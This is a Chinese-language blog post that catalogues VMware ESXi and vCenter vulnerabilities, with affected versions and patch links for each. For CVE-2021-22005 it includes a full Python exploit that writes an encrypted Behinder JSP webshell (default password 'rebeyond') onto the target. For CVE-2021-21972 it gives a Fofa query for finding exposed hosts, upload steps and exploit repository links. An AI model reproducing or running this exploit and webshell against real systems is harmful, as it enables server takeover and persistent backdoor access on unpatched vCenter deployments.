VMware vcenter/ESXI系列漏洞总结

已于 2022-10-13 13:44:35 修改
阅读量2.7w 收藏 38
点赞数 12
分类专栏: 经验知识总结 文章标签: VMware ESXI VMware vCenter
于 2022-06-22 16:46:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46944519/article/details/125411554
版权
本文汇总了VMware ESXI和VCenter Server的多个安全漏洞,包括远程代码执行、身份验证绕过和拒绝服务等。受影响的产品版本包括ESXI 6.5、6.7、7.0及VCenter Server 6.5、6.7、7.0。攻击者可通过这些漏洞执行恶意代码、绕过身份验证或引发服务中断。建议用户及时安装官方发布的安全补丁进行防护。
摘要由CSDN通过智能技术生成

文章目录

前言

本文章主要对VMware ESXI、VMware VCenter系列进行漏洞整理,更多内容后续补充!

漏洞一、VMware ESXI 远程代码执行漏洞(CVE-2020-3992)

漏洞概述:
漏洞来源于ESXi中使用的OpenSLP存在“use-after-free”释放后重利用问题,当攻击者在管理网络(management network)中时,可以通过访问ESXi宿主机的427端口触发OpenSLP服务的user-after-free,从而导致远程代码执行。
在这里插入图片描述
影响范围

受影响产品版本

•	ESXi = 6.5
•	ESXi = 6.7
•	ESXi = 7.0
•	VMware Cloud Foundation (ESXi) = 3.X
•	VMware Cloud Foundation (ESXi) = 4.X

不受影响产品版本

•	ESXi650-202010401-SG
•	ESXi670-202010401-SG
•	ESXi_7.0.1-0.0.16850804
•	VMware Cloud Foundation (ESXi) = 3.10.1.1
•	VMware Cloud Foundation (ESXi) = 4.1

漏洞防护
在这里插入图片描述

漏洞二、VMware ESXI身份验证和拒绝服务漏洞

漏洞概述:

VMware ESXi中存在身份验证绕过漏洞(CVE-2021-21994)和拒绝服务漏洞(CVE-2021-21995),攻击者可利用这两个漏洞绕过身份验证和发起拒绝服务攻击。

1、 VMware ESXi SFCB身份验证绕过漏洞(CVE-2021-21994)

由于ESXi中使用的SFCB(Small Footprint CIM Broker)存在身份验证绕过漏洞,具有5989端口访问权限的攻击者可以利用该漏洞发送恶意请求来绕过SFCB身份验证。(注:在默认情况下,ESXi上未启用SFCB服务)

2、VMware ESXi OpenSLP拒绝服务漏洞(CVE-2021-21995)

由于堆越界读取问题,ESXi中使用的OpenSLP存在拒绝服务漏洞。具有427端口访问权限的攻击者可以在OpenSLP服务中触发堆越界读取,从而导致拒绝服务。

影响范围

VMware ESXi 7.0
VMware ESXi 6.7
VMware ESXi 6.5
VMware Cloud Foundation (ESXi) 4.x
VMware Cloud Foundation (ESXi) 3.x

漏洞防护

目前官方已发布安全版本,建议受影响用户及时下载相应补丁包进行防护:

1、CVE-2021-21994:
https://kb.vmware.com/s/article/1025757

2、CVE-2021-21995:
https://kb.vmware.com/s/article/76372

漏洞三、VMware vCenter Server 任意文件上传漏洞复现(CVE-2021-22005)

在这里插入图片描述
漏洞概述

在CVE-2021-22005中,攻击者可构造恶意请求,通过vCenter中的Analytics服务,可上传恶意文件,从而造成远程代码执行漏洞。

影响范围

VMware vCenter Server 7.0系列 < 7.0 U2c
VMware vCenter Server 6.7系列 < 6.7 U3o
VMware vCenter Server 6.5系列 不受漏洞影响

安全版本

VMware vCenter Server 7.0 U2c
VMware vCenter Server 6.7 U3o

利用脚本

import requests
import random
import string
import sys
import time
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
 
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
 return ''.join(random.choice(chars) for _ in range(size))
  
def escape(_str):
 _str = _str.replace("&", "&amp;")
 _str = _str.replace("<", "&lt;")
 _str = _str.replace(">", "&gt;")
 _str = _str.replace("\"", "&quot;")
 return _str
  
def str_to_escaped_unicode(arg_str):
 escaped_str = ''
 for s in arg_str:
   val = ord(s)
   esc_uni = "\\u{:04x}".format(val)
   escaped_str += esc_uni
 return escaped_str
 
 
def createAgent(target, agent_name, log_param):
 
  
 url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (target, agent_name, log_param)
 headers = { "Cache-Control": "max-age=0", 
       "Upgrade-Insecure-Requests": "1", 
       "User-Agent": "Mozilla/5.0", 
       "X-Deployment-Secret": "abc", 
       "Content-Type": "application/json", 
       "Connection": "close" }
       
 json_data = { "manifestSpec":{}, 
        "objectType": "a2",
        "collectionTriggerDataNeeded": True,
        "deploymentDataNeeded":True, 
        "resultNeeded": True, 
        "signalCollectionCompleted":True, 
        "localManifestPath": "a7",
        "localPayloadPath": "a8",
        "localObfuscationMapPath": "a9" }
         
 requests.post(url, headers=headers, json=json_data, verify=False)
  
 
def generate_manifest(webshell_location, webshell):
 
 manifestData = """<manifest recommendedPageSize="500">
   <request>
    <query name="vir:VCenter">
      <constraint>
       <targetType>ServiceInstance</targetType>
      </constraint>
      <propertySpec>
       <propertyNames>content.about.instanceUuid</propertyNames>
       <propertyNames>content.about.osType</propertyNames>
       <propertyNames>content.about.build</propertyNames>
       <propertyNames>content.about.version</propertyNames>
      </propertySpec>
    </query>
   </request>
   <cdfMapping>
    <indepedentResultsMapping>
      <resultSetMappings>
       <entry>
         <key>vir:VCenter</key>
         <value>
                      <value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
            <resourceItemToJsonLdMapping>
             <forType>ServiceInstance</forType>
            <mappingCode><![CDATA[  
             #set($appender = $GLOBAL-logger.logger.parent.getAppender("LOGFILE"))##
             #set($orig_log = $appender.getFile())##
             #set($logger = $GLOBAL-logger.logger.parent)##  
             $appender.setFile("%s")##  
             $appender.activateOptions()## 
             $logger.warn("%s")## 
             $appender.setFile($orig_log)##  
             $appender.activateOptions()##]]>
            </mappingCode>
            </resourceItemToJsonLdMapping>
          </value>
         </value>
       </entry>
      </resultSetMappings>
    </indepedentResultsMapping>
   </cdfMapping>
   <requestSchedules>
    <schedule interval="1h">
      <queries>
       <query>vir:VCenter</query>
      </queries>
    </schedule>
   </requestSchedules>
 </manifest>""" % (webshell_location, webshell)
  
 return manifestData
 
def arg():
 parser = argparse.ArgumentParser()
 parser.add_argument("-t", "--target", help = "Target", required = True)
 args = parser.parse_args()
 target = args.target
 print("[*] Target: %s" % target)
 return target
 
def exec():
 target = arg()
 # Variables
 webshell_param = id_generator(6)
 log_param = id_generator(6)
 agent_name = id_generator(6)
 shell_name = "Server.jsp"
 webshell = """<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>"""
 
 webshell_location = "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % shell_name
 webshell = str_to_escaped_unicode(webshell)
 manifestData = generate_manifest(webshell_location,webshell)
 print("[*] Creating Agent")
 createAgent(target, agent_name, log_param)
 url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (target, agent_name, log_param)
 headers = {"Cache-Control": "max-age=0", 
          "Upgrade-Insecure-Requests": "1", 
          "User-Agent": "Mozilla/5.0", 
          "X-Deployment-Secret": "abc", 
          "Content-Type": "application/json", 
          "Connection": "close"}
 json_data ={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
 requests.post(url, headers=headers, json=json_data, verify=False)
 #webshell连接地址
 url = "%s/idm/..;/%s" % (target, shell_name)
 code = requests.get(url=url, headers=headers,verify=False).status_code
 if code != "404":
   print("webshell地址: %s" % url)
   print("[*]冰蝎3.0 Webshell连接密码: rebeyond" )
 
 else:
   print("未获取到webshell地址")
 
 
if __name__ == '__main__':
 exec()

漏洞四、VMware VCenter未授权任意文件上传漏洞(CVE-2021-21972)

在这里插入图片描述
漏洞描述:

CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可。

影响版本

VMware vCenter Server 7.0系列 < 7.0.U1c 

VMware vCenter Server 6.7系列 < 6.7.U3l 

VMware vCenter Server 6.5系列 < 6.5 U3n 

VMware ESXi 7.0系列 < ESXi70U1c-17325551 

VMware ESXi 6.7系列 < ESXi670-202102401-SG 

VMware ESXi 6.5系列 < ESXi650-202102101-SG 测试通过版本

VMware-VCSA-all-6.7.0-8217866 

VMware-VIM-all-6.7.0-8217866 2021-02-24

Fofa查询

Fofa语法-> title=“+ ID_VC_Welcome +”

Poc -> https://x.x.x.x/ui/vropspluginui/rest/services/uploadova
在这里插入图片描述
如果404401,则代表不存在漏洞,如果405200,则代表可能存在漏洞

利用方式

使用 Tabbed Postman - REST Client 工具 POST请求上传shell文件 也可使用 postman #注:返回状态码200 SUCCESS即上传成功。
在这里插入图片描述
在这里插入图片描述
使用冰蝎3.0连接shell 即可! 连接地址:x.x.x.x/ui/resources/shell.jsp、密码3.0默认。

脚本如下

https://github.com/horizon3ai/CVE-2021-21972
https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/

修复建议

vCenter Server7.0版本升级到7.0.U1c
vCenter Server6.7版本升级到6.7.U3l
vCenter Server6.5版本升级到6.5 U3n

漏洞五、VMware vCenter Server远程代码执行漏洞(CVE-2021-21985)

在这里插入图片描述
漏洞概述:

该漏洞由于vCenter Server默认启用的插件Virtual SAN Health Check缺少输入验证导致的。能通过443端口访问到vSphere Client(HTML5)的攻击者,可以构造特殊的请求包在目标机器上执行任意代码。

影响版本

VMware vCenter Server 7.0系列 < 7.0.U2b
VMware vCenter Server 6.7系列 < 6.7.U3n
VMware vCenter Server 6.5系列 < 6.5 U3p
VMware Cloud Foundation 4.x 系列 < 4.2.1
VMware Cloud Foundation 4.x 系列 < 3.10.2.1

利用脚本

https://github.com/r0ckysec/CVE-2021-21985
https://github.com/xnianq/cve-2021-21985_exp

在这里插入图片描述

相关链接

Vcenter实战利用方式可详情右侧文章链接:https://mp.weixin.qq.com/s/PpH8obumyMYQi95cQLqOSw

李火火安全阁
关注
专栏目录
vCenter 漏洞利用总结
内心不种满鲜花就会长满杂草
07-24 3271
VMware vCenterVMware公司推出的集中化虚拟化管理平台。它是VMware vSphere虚拟化解决方案的核心组件之一。vCenter的主要功能是管理和监控整个vSphere虚拟化基础架构,包括多个ESXi主机和虚拟机。vSpherevSphere是VMware的虚拟化平台的总称,它是一套完整的虚拟化解决方案,包括了多个组件和功能,用于构建和管理虚拟化环境。
VMware_ESXI_OpenSLP_PoCs:CVE-2020-3992和CVE-2019-5544
05-23
VMware_ESXI_OpenSLP_PoC CVE-2020-3992和CVE-2019-5544 在VMware Workstation上安装的ESXI上进行了测试。 如果是在真正的机器上,则可能需要更改srvtype字段(服务:VMwareInfrastructure)。
漏洞预警,VMware远程代码执行漏洞的严重等级达到9.8(满分10)
Karka_的博客
12-26 1341
2021 年 2 月 23 日,VMware 公司发布漏洞安全公告,VMware 多个组件存在远程代码执行、堆溢出漏洞和信息泄露漏洞的高危漏洞。机器之心报道,机器之心编辑部。就在几天前,一些互联网公司监测到 VMware 官方发布安全公告,披露了包括 CVE-2021-21972、CVE-2021-21973 和 CVE-2021-21974 在内的高危漏洞。攻击者可以通过发送精心构造的恶意数据包造成远程执行代码,获取接管服务器权限,存在极大的安全隐患。
推荐使用CVE-2021-21985漏洞检测与利用工具
最新发布
gitblog_00250的博客
08-28 382
推荐使用CVE-2021-21985漏洞检测与利用工具 CVE-2021-21985_PoC项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2021-21985_PoC 项目介绍 CVE-2021-21985是一个针对VMware vSphere Client(HTML5)的远程代码执行漏洞。该漏洞源于Virtual SAN Health Check插件中缺...
VMware vCenter Server任意文件上传漏洞(CVE-2021-22005)复现
热门推荐
内心不种满鲜花就会长满杂草
09-29 1万+
目录 漏洞描述 影响版本 漏洞检测poc 漏洞EXP 声明:切勿用于非法入侵,仅供检测与学习!传送门 ——>中华人民共和国网络安全法 漏洞描述 2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。 其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-2021-22005),该漏洞存在于vCenter Server的分析服务中,其CVSSv3评分为 9.8.
VMware ESXi OpenSLP堆溢出漏洞,附本次勒索软件ESXiArgs恶意文件分析(CNVD-2021-12321对标CVE-2021-21974)
鸭梨山大。
02-14 3975
近日以VMware ESXi服务器为目标的大规模勒索软件攻击正在席卷全球,包括法国、芬兰、加拿大、美国、意大利等多个国家数千台服务器遭到入侵。攻击者利用了2021年2月公开的高危漏洞(CNVD-2021-12321,),可以向WMware ESXi软件目标服务器427端口发送恶意构造的数据包,从而触发其OpenSLP服务堆缓冲区溢出,并执行任意代码,借以部署新的 ESXiArgs 勒索软件。一、漏洞详情VMware vSphere是美国威睿公司推出一套服务器虚拟化解决方案,包括虚拟化、管理和界面层。
干货分享 | VMware vCenter漏洞实战利用总结
mingyqf的博客
01-31 2267
零队 [EchoSec](javascript:void(0)😉收录于合集#vmware1个文章来源:零队**前言**Vcenter一般指VMware vCenter Server,其提供了一个可伸缩、可扩展的平台,为虚拟化管理奠定了基础,可集中管理VMware vSphere环境,与其他管理平台相比,极大地提高了IT管理员对虚拟环境的控制,Vcenter可以使管理员从一个位置深入了解虚拟基础架构的集群、主机、虚拟机、存储、客户操作系统和其他关键组件等所有信息。利用思路。
警惕!多种恶意软件程序发起 VMware 漏洞利用攻击
VN520的博客
08-21 583
今年4 月,VMware 公布并修补了编号为 CVE-2022-22954的远程代码执行漏洞。因为缺乏对参数“deviceUdid”和“devicetype”进行有效的清理,该漏洞引入了服务器侧模版的注入攻击的可能性。它允许攻击者注入载荷,并能够在VMwareWorkspace ONE Access 和 Identity Manager 组件上进行远程代码执行。FortiGuard。
VMware 修复严重的ESXi和vRealize 漏洞
smellycat000的专栏
12-15 2460
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士VMware 发布安全更新,修复了一个影响ESXi、Workstation、Fusion和Cloud Foundation 的严重漏洞 (CVE-2022-31705) 以及一个影响 vRealize Network Insight 的严重的命令注入漏洞 (CVE-2022-31702)。CVE-2022-31705CVE-2022-31705是...
vmware+esxi5+全系列注册机
05-25
在本案例中,提及的是"vmware+esxi5+全系列注册机",这涉及到的是如何激活VMware ESXi 5.x版本的问题。 在软件行业中,"注册机"通常指的是用于生成产品激活码的工具,这些激活码可以绕过软件的正版验证机制,使用户...
vmware esxi 4.1 序列号
07-28
其中,ESXi 4.1版本是该系列中的一个重要版本,在当时引领了虚拟化技术的发展方向。本文将详细介绍关于VMware ESXi 4.1序列号的相关知识。 #### 二、ESXi 4.1 版本介绍 VMware ESXi 4.1是一款由VMware公司开发的...
VMware ESXi 服务器的大规模勒索攻击事件
02-11
1. **VMware ESXi和VCenter Server漏洞**: - VMware官方发布了安全公告,揭示了几个高危漏洞,包括CVE-2021-21972、CVE-2021-21973和CVE-2021-21974。 - 这些漏洞可能导致远程代码执行和服务器端请求伪造,使攻击...
VMware vCenter Server 6.7 for windows 2008 R2 SP1 操作系统补丁
04-01
VMware vCenter Server是VMware公司提供的一款数据中心管理平台,用于集中管理虚拟化环境中的ESXi主机、虚拟机以及相关的网络和存储资源。在安装VMware vCenter Server 6.7版本时,为了确保系统的稳定性和兼容性,...
ESXi主机CVE-2021-21972漏洞复现安全处置建议
tigerman20201的博客
02-18 2185
一、漏洞简介 vSphere是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机。 vSphere Client(HTML5) 在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,写入webshell,控制服务器
VmWare vCenter Server漏洞修复方案
Only No.1
07-12 870
vCenter Server 释放后重用漏洞(CVE-2023-20893)vCenter Server 越界写入漏洞(CVE-2023-20894)vCenter Server 越界读取漏洞(CVE-2023-20895)vCenter Server 越界读取漏洞(CVE-2023-20896)vCenter Server 堆溢出漏洞(CVE-2023-20892)Apache Tomcat版本:>=11.0.0-M6。Apache Tomcat 版本:11.0.0-M5。以上五个漏洞受影响版本。
vCenter 服务器漏洞可导致代码执行和认证绕过
smellycat000的专栏
06-25 970
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士VMware 修复了位于 vCenter Server 中的多个高危漏洞,可导致攻击者获得代码执行权限并绕过未修复系统上的认证。vCenter Server 是VMware 的 vSphere 套件控制中心,也是一款服务器管理解决方案,帮助管理员管理和监控虚拟化基础设施。这些漏洞位于 vCenter Server 使用的 DCE/RPC 协议实现...
ESXi 勒索病毒ESXiArgs 其 CVE-2021-21974 漏洞分析
Songxwn的博客
02-07 1520
SLP服务漏洞
VMware ESXi OpenSLP 堆溢出漏洞(CVE-2021–21974)勒索事件
qq_42067124的博客
02-09 1659
VMware ESXi OpenSLP 堆溢出漏洞(CVE-2021–21974)的流量特征和修复方法
在配置 fence_vmware_soap 设备时,你需要先在 VMware vCenter 或者 ESXi 中创建一个用户,并授予其访问权限。然后,你需要在 fence 软件的配置文件 /etc/fence.conf 中添加以下内容:这里可以用root用户吗
06-09
在配置 fence_vmware_soap 设备时,不建议使用 root 用户来创建 VMware vCenterESXi 用户,并授予其访问权限。这是因为 root 用户具有系统管理员的权限,如果该用户的凭据泄露出去,黑客可能会利用这个漏洞来攻击你的系统。因此,建议创建一个专门的用户来访问 VMware vCenterESXi,并授予该用户仅限于所需操作的权限,以增强系统的安全性。在 fence 软件的配置文件 /etc/fence.conf 中,你需要使用该专门的用户的凭据来配置 VMware vCenterESXi 的访问权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值